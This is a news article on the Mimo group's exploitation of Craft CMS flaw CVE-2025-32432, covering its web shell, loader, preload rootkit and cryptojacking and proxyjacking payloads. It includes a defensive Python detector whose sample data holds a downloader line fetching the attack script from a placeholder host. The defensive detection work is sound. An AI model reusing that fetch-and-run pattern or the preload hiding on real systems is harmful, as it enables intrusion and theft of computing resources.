
A recent vulnerability, CVE-2025-32432, discovered in the widely used content management system Craft CMS, has swiftly become a new weapon in the arsenal of the cybercriminal group known as Mimo—a financially motivated and well-established threat actor. Shortly after the flaw was disclosed in February 2025, experts at Orange Cyberdefense SensePost observed its active exploitation. However, the vulnerability was only addressed in the most recent Craft CMS updates—versions 3.9.15, 4.14.15, and 5.6.17.
According to a new report by Sekoia, the Mimo group wasted no time incorporating CVE-2025-32432 into their operational toolkit. Once unauthorized access to a target system is achieved, attackers deploy a web shell to establish persistence and remote control. Through this shell, they download and execute a shell script named 4l4md4r.sh, fetched from a remote server via curl, wget, or even through the urllib2 library—ironically renamed “fbi” by the attackers, a mocking nod that serves as an additional indicator during Python-based malware analysis.
The script begins by scanning for evidence of prior infections and cleanses the system of rival cryptominers, including XMRig. Once the system is purged of competing processes, the second phase of the attack commences: the ELF binary 4l4md4r—also known as the Mimo Loader—is downloaded and launched. Its purpose is to modify the system file /etc/ld.so.preload to conceal the primary malicious extension, alamdar.so, thereby evading detection.
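Two of the indicators above lend themselves to a simple host check: an unexpected entry in /etc/ld.so.preload, and a Python downloader that binds urllib2 to the alias "fbi". The script below is an added illustration written for this article, not code from Sekoia or from the Mimo toolkit. Only the path /etc/ld.so.preload, the names alamdar.so and 4l4md4r, and the "fbi" alias come from the report; the sample file contents, the allowlist and the directory heuristics are constructed assumptions.

```python
import os
import re

# Constructed sample of what /etc/ld.so.preload might look like after the
# loader has appended its library. glibc treats '#' as a comment marker and
# separates entries by whitespace, so the parser below follows that format.
SAMPLE_PRELOAD = (
    "# constructed sample, not a real capture\n"
    "/usr/lib/x86_64-linux-gnu/libSegFault.so\n"
    "/tmp/.x/alamdar.so\n"
)

# Constructed sample of a Python downloader that aliases urllib2 as "fbi".
# The URL host is a placeholder, not an indicator from the report.
SAMPLE_PY = (
    "import urllib2 as fbi\n"
    "data = fbi.urlopen('http://HOST-PLACEHOLDER/4l4md4r.sh').read()\n"
)

# File names the report associates with this campaign.
CAMPAIGN_NAMES = {"alamdar.so", "4l4md4r", "4l4md4r.sh"}

# World-writable locations where a legitimately preloaded library should not live.
UNTRUSTED_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Hypothetical allowlist: libraries an administrator preloaded on purpose.
KNOWN_PRELOAD_NAMES = frozenset({"libSegFault.so"})


def suspicious_preload_entries(content, allowlist=frozenset()):
    """Return (entry, reason) pairs for ld.so.preload entries that warrant a look.

    The first matching reason is reported: a known campaign file name, a
    world-writable directory, a hidden directory component, or simply an entry
    that is not on the administrator's allowlist (on most servers the file
    should be absent or empty, so any unknown entry is worth investigating).
    """
    flagged = []
    for line in content.splitlines():
        for entry in line.split("#", 1)[0].split():  # strip comments, split on whitespace
            name = os.path.basename(entry)
            parent_parts = entry.split("/")[:-1]
            if name in CAMPAIGN_NAMES:
                flagged.append((entry, "known campaign artifact"))
            elif any(entry.startswith(d + "/") for d in UNTRUSTED_DIRS):
                flagged.append((entry, "library in world-writable directory"))
            elif any(part.startswith(".") for part in parent_parts):
                flagged.append((entry, "library in hidden directory"))
            elif name not in allowlist:
                flagged.append((entry, "not on preload allowlist"))
    return flagged


# Matches 'import urllib2 as <alias>' at the start of a line.
_ALIAS_RE = re.compile(r"^\s*import\s+urllib2\s+as\s+(\w+)", re.MULTILINE)


def find_aliased_urllib2(source):
    """Return the alias names bound to urllib2 in a piece of Python source."""
    return _ALIAS_RE.findall(source)


def scan_host(preload_path="/etc/ld.so.preload", allowlist=KNOWN_PRELOAD_NAMES):
    """Read the live preload file, if present, and return flagged entries."""
    if not os.path.exists(preload_path):
        return []  # absence of the file is the normal state on most systems
    with open(preload_path, encoding="utf-8", errors="replace") as fh:
        return suspicious_preload_entries(fh.read(), allowlist)


if __name__ == "__main__":
    for entry, reason in suspicious_preload_entries(SAMPLE_PRELOAD, KNOWN_PRELOAD_NAMES):
        print(f"preload: {entry}  ({reason})")
    for alias in find_aliased_urllib2(SAMPLE_PY):
        print(f"urllib2 aliased as '{alias}'")
    for entry, reason in scan_host():
        print(f"live host: {entry}  ({reason})")
```

One caveat when running this on a suspect host: a preloaded library can hook the file and directory functions that every dynamically linked program uses, so the file you read may not be what the loader actually sees. Reading /etc/ld.so.preload from a rescue environment or with a statically linked tool avoids that blind spot.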
Once entrenched in the system, the Mimo Loader prepares the ground for the deployment of two monetization tools: the XMRig cryptominer and the IPRoyal proxy service. This dual payload enables parallel profit streams: harnessing the victim’s computing power to mine cryptocurrency and leasing the compromised network bandwidth for anonymous—and often illicit—activities. These techniques are known as cryptojacking and proxyjacking, respectively.
Active since at least March 2022, the Mimo group has been repeatedly mentioned in technical analyses for exploiting known vulnerabilities in high-profile systems, including Apache Log4j (CVE-2021-44228), Atlassian Confluence (CVE-2022-26134), PaperCut (CVE-2023-27350), and Apache ActiveMQ (CVE-2023-46604). In 2023, the group was also linked to ransomware activity involving MauriCrypt, a fork known by the alias Mimus.
Sekoia’s findings indicate that most of the attack chains originate from Turkish IP addresses, consistent with earlier intelligence regarding the group’s likely geographic base. The speed of their operation was striking: mere days separated the vulnerability’s disclosure, the emergence of a working proof-of-concept, and its deployment at scale—underscoring the group’s high technical agility.
The operators behind Mimo remain vigilant, swiftly incorporating newly exposed flaws into their toolkit. As major CMS platforms race to patch critical vulnerabilities, one can only speculate which product will next fall prey to this group, which continues to profit deftly from compromised systems—by mining value both in processing power and connectivity.